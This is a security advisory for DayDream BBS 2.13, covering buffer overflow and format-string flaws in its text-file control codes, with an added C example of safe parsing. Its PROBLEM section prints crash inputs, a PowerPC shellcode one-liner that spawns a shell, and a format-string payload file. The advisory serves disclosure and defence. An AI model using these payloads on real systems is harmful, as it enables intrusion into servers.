COMMAND

    DayDream BBS buffer overflow and format string vulnerabilities

SYSTEMS AFFECTED

    DayDream BBS 2.13

PROBLEM

    KF (dotslash@snosoft.com) revealed:

    1- Buffer Overflow

    The text file control codes ~#MC, ~#TF and ~#RA were vulnerable to a
    buffer overflow attack, for instance:

        [root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1596'`\|> display/iso/welcome.gfx
        [root@linuxppc bbs]# ./daydream

    Fill in the user name and password, and see daydream crash.

    Exploit line for shell:

        [root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68" x 1'`A`perl -e 'print "\x7f\xff\xd4\xd8"'`\| > /home/bbs/display/iso/welcome.gfx

    2- Format string

    Sample, self-explanatory:

        echo "~#RA%s%s%s%s%s%s" > filetoupload.gfx

    Then place this file on the server and view it via the menu system.

SOLUTION

    The latest version is not vulnerable; get it from:

        http://daydream.iwn.fi
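
An added example, not DayDream's code and not part of the original advisory: a C handler for the ~#MC, ~#TF and ~#RA control codes that avoids both bug classes listed under PROBLEM, by bounding the argument copy and by printing the argument only as data. The function names, the 256-byte buffers, and the assumption that an argument ends at '|' or end of line are hypothetical.

```c
#include <stdio.h>
#include <string.h>

enum cc_status { CC_OK = 0, CC_NOT_CODE = -1, CC_TOO_LONG = -2 };

/* Hypothetical helper: copy the argument of a ~#MC, ~#TF or ~#RA control
 * code into out. Assumption: the argument ends at '|' or end of line. */
enum cc_status cc_parse(const char *line, char *out, size_t outsz)
{
    static const char *const codes[] = { "~#MC", "~#TF", "~#RA" };
    const char *arg = NULL;

    for (size_t i = 0; i < sizeof codes / sizeof codes[0]; i++)
        if (strncmp(line, codes[i], 4) == 0)
            arg = line + 4;
    if (arg == NULL)
        return CC_NOT_CODE;

    size_t len = strcspn(arg, "|\r\n");
    if (len >= outsz)          /* bug class 1: strcpy(out, arg) skips this check */
        return CC_TOO_LONG;
    memcpy(out, arg, len);
    out[len] = '\0';
    return CC_OK;
}

/* Bug class 2 is passing arg as the format itself, snprintf(dst, n, arg).
 * Here arg is only ever data for a constant "%s" format. */
int cc_render(char *dst, size_t dstsz, const char *arg)
{
    return snprintf(dst, dstsz, "%s", arg);
}

int main(void)
{
    /* Constructed inputs modelled on the advisory's two test files. */
    char big[1700], out[256], dst[256];
    memcpy(big, "~#MC", 4);
    memset(big + 4, 'A', 1596);
    memcpy(big + 1600, "|", 2);

    printf("long ~#MC argument -> %d\n", cc_parse(big, out, sizeof out));
    if (cc_parse("~#RA%s%s%s%s%s%s\n", out, sizeof out) == CC_OK) {
        cc_render(dst, sizeof dst, out);
        printf("~#RA argument printed as data: %s\n", dst);
    }
    return 0;
}
```

Compiling with -Wformat -Wformat-security also flags any remaining call where a non-literal string is passed as the format argument.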